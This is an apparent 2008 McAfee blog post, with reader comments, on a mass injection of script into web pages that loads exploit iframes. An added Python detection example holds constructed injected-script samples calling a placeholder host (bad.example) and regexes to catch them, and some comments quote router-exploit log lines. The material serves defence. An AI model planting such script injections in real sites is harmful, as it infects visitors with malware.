Another Mass Attack Underway
Wednesday March 12, 2008 at 4:35 pm CST
Posted by Craig Schmugar
On the heels of recent iframe attacks, we’re currently tracking another mass compromise. This attack involves injection of script into valid web pages to include a reference to a malicious .JS file (sometimes in the BODY, other times in the TITLE section). The .JS file uses script to write an IFRAME, which loads an HTML file that attempts to exploit several vulnerabilities, including:
- MS06-014
- RealPlayer (ActiveX Control)
- Baofeng Storm (ActiveX Control)
- Xunlei Thunder DapPlayer (ActiveX Control)
- Ourgame GLWorld GlobalLink Chat (ActiveX Control)
This is one of those cascading threats, where one page leads to another and another, which leads to an executable, which leads to another and another. At least one of the payload trojans targets online gamers.
Preliminary research results suggest more than 10,000 pages were affected by this hack attack.
Similar attacks were observed in the past; most notably, the infamous “Dolphin Stadium” (aka Super Bowl) attack was similar, and was later connected with SQL injection as the method the attackers used to inject their malicious code. In cases where the TITLE tag has been modified, the browser’s title bar will show the script reference:

[Image: Example of browser title bar (censored)]
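As an added defender-side example (not McAfee’s code or tooling), the following Python scan looks for the two signs described above: a script reference pulled from a host the site does not own, including one injected into the TITLE section, and a .JS file that writes an IFRAME. The pages, the script and the hosts are constructed placeholders, not indicators from this post.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed samples; the hosts are placeholders, not indicators from the post.
OWN_HOSTS = {"shop.example"}
CLEAN_PAGE = ("<html><head><title>Store</title></head><body><p>Hi</p>"
              "<script src='/js/app.js'></script></body></html>")
TITLE_PAGE = ("<html><head><title>Store<script src=http://bad.example/x.js>"
              "</script></title></head><body></body></html>")
BODY_PAGE = ("<html><head><title>Store</title></head><body><p>Hi</p>"
             '<script src="http://bad.example/y.js"></script></body></html>')
IFRAME_JS = "document.write('<ifr' + 'ame src=\"http://bad.example/e.htm\" width=0></iframe>');"
# A <script src=...> that survives as literal text inside <title>.
TITLE_SCRIPT = re.compile(r"<script[^>]*\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)

class _ScriptCollector(HTMLParser):
    """Records every script src and whether it appeared inside <title>."""
    def __init__(self):
        super().__init__()
        self.in_title, self.title_text, self.scripts = False, [], []
    def handle_starttag(self, tag, attrs):
        if tag == "title":
            self.in_title = True
        elif tag == "script" and dict(attrs).get("src"):
            self.scripts.append((dict(attrs)["src"], self.in_title))
    def handle_endtag(self, tag):
        if tag == "title":
            self.in_title = False
    def handle_data(self, data):
        if self.in_title:
            self.title_text.append(data)

def scan_page(html, own_hosts):
    """Return (reason, src) pairs for script references that look injected."""
    p = _ScriptCollector()
    p.feed(html)
    p.close()
    # Browsers (and recent html.parser releases) treat <title> content as text, so a tag
    # injected there shows up as title text; older parsers report it as a real tag.
    refs = p.scripts + [(s, True) for s in TITLE_SCRIPT.findall("".join(p.title_text))]
    findings = []
    for src, in_title in dict.fromkeys(refs):
        host = urlparse(src).netloc.lower()
        if host and host not in own_hosts:   # loaded from a host the site does not own
            findings.append(("external_script", src))
        if in_title:                          # script where only a page title belongs
            findings.append(("script_in_title", src))
    return findings

def looks_like_iframe_writer(js):
    joined = re.sub(r"""['"]\s*\+\s*['"]""", "", js)  # '<ifr' + 'ame' -> '<iframe'
    return re.search(r"document\.write\w*\s*\(.*?<\s*iframe", joined, re.I | re.S) is not None
```

Run scan_page over a crawl of your own site’s HTML and looks_like_iframe_writer over any script it references that you did not deploy; the title-bar symptom in the screenshot above corresponds to the script_in_title finding.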
McAfee’s designations for the various pieces of malware include:
- Downloader-BGX
- Exploit-RealPlay
- JS/Exploit-BO.gen
- VBS/Psyme
Analysis is ongoing.

March 13th, 2008 at 12:09
hello,
I do not know if this is related or known: every few days there is an attack on my website which does not succeed, since a PC in general is not vulnerable, but certain routers are.
Here is an excerpt from my access log:
——————————————————————
41.232.21.69 - - [07/Mar/2008:13:44:58 +0200] "POST /cgi-bin/firmwarecfg HTTP/1.1" 400 431 "-" "veryprivateacsor"
41.234.44.208 - - [07/Mar/2008:22:03:53 +0200] "POST /cgi-bin/firmwarecfg HTTP/1.1" 400 431 "-" "veryprivateacsor"
41.234.15.165 - - [07/Mar/2008:22:03:54 +0200] "POST /cgi-bin/firmwarecfg HTTP/1.1" 400 431 "-" "veryprivateacsor"
——————————————————————-
Here is the corresponding error log:
——————————————————————-
[Fri Mar 07 13:44:58 2008] [error] [client 41.232.21.69] request failed: error reading the headers
[Fri Mar 07 22:03:53 2008] [error] [client 41.234.44.208] request failed: error reading the headers
[Fri Mar 07 22:03:54 2008] [error] [client 41.234.15.165] request failed: error reading the headers
——————————————————————-
A complaint to the service provider had no result!!
peace,
Jan de Kruyf.
March 14th, 2008 at 00:19
How did they break into the website? If it is automated, it must be a widely spread exploit that is worth reporting.
March 14th, 2008 at 04:28
That is an attempt to exploit a 3 year old vulnerability found in some DSL routers if remote management is enabled and is very likely not related to the Mass Hack Attacks.
cheers,
Toralv
March 14th, 2008 at 10:28
Could McAfee show us a video demo of this attack in action, similar to the video for the phpBB hack?
Thanks.
March 14th, 2008 at 11:25
There’s not much to see… the drive-by can cause IE to hang, and the payload doesn’t display anything.
March 15th, 2008 at 03:17
Bas Groot Says:
March 14th, 2008 at 12:19 am
How did they break into the website? If it is automated, it must be a widely spread exploit that is worth reporting.
—————————————————————-
It is automated, it comes from Europe, Holland and France the last time I checked, and it is indeed aimed at certain routers. There was a general discussion about 3 years back on the net.
From my analysis they request a specific file on this router, “/cgi-bin/firmwarecfg”; if they are the first running it, then it leaves the whole system wide open since they have access to all info in the router, or something like that. In any case, complaints to my provider or to the provider from whose network some of the attacks originate have not been answered whatsoever.
Peace
Jan de Kruyf.
March 17th, 2008 at 21:06
So is it a common web server software that is being hacked: Apache, IIS, what have you?
March 18th, 2008 at 08:52
Blind SQL injection was used to attack ASP applications. The vulnerability is in the coding of the applications and improper sanitization of input parameters.
More details are available here:
http://blogs.technet.com/neilcar/archive/2008/03/15/anatomy-of-a-sql-injection-incident-part-2-meat.aspx
March 18th, 2008 at 12:47
System admins should be ready to prevent their clients from getting exploited and redirected to those malicious domains.
Check here: http://extremesecurity.blogspot.com/2008/03/iframe-attacks-actions-to-be-taken.html
March 19th, 2008 at 12:08
So, how can an ordinary user recognize if their computer is infected with this virus/trojan? Is there a file name we should be looking for in the Task Manager or elsewhere?
April 24th, 2008 at 01:37
[...] as detailed on the McAfee blog, the malicious server would have attempted, as indicated, to inject via iframe [...]
May 14th, 2008 at 10:08
[...] Following the big noise that the latest mass injection of sites with malicious Javascripts infecting many computers via a number of exploits I decided to [...]
May 16th, 2008 at 14:42
[...] In March I blogged about a round of mass Web site compromises. Since then there have been several other instances [...]
May 25th, 2008 at 08:08
[...] March I blogged about a round of mass Web site compromises. Since then there have been several other instances [...]
July 8th, 2008 at 03:49
[...] well-known computer security company McAfee has reported that it has identified more than 10,000 fraudulent web pages that attempted to sneak into the [...]
June 19th, 2009 at 00:42
[...] to hackers in massive attack. Hackers have carried out a massive attack on thousands of websites. In doing so, the hackers also attacked the website of computer security consultant Trend Micro. [...]